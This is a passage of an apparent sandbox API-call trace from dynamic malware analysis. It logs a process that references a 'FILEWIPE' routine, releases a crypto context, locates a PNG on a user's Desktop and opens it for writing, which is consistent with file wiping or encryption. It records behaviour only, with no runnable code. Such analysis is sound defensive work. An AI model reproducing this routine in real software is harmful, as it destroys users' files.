wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.366] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.366] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.366] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0158.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.366] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.366] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.366] FreeLibrary (hLibModule=0x74f20000) returned 1 [0158.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.368] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.379] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.379] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0158.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee06400, ftCreationTime.dwHighDateTime=0x1d5d866, ftLastAccessTime.dwLowDateTime=0x9c0fa5c0, ftLastAccessTime.dwHighDateTime=0x1d5db77, ftLastWriteTime.dwLowDateTime=0x9c0fa5c0, ftLastWriteTime.dwHighDateTime=0x1d5db77, nFileSizeHigh=0x0, nFileSizeLow=0xe652, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="bQ9gmgo1CPU5L0JTf.png", cAlternateFileName="BQ9GMG~1.PNG")) returned 0x90af58 [0158.380] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0158.380] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.380] CharLowerBuffW (in: lpsz="byte[58962]", cchLength=0xb | out: lpsz="byte[58962]") returned 0xb [0158.380] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.380] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0158.380] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.380] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0158.380] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0158.381] FreeLibrary (hLibModule=0x75c90000) returned 1 [0158.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.381] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.381] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0158.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.382] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0158.382] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bq9gmgo1cpu5l0jtf.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0158.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0158.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0158.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0158.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0158.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d37e0 | out: hHeap=0x8a0000) returned 1 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0158.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.386] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0158.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0158.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 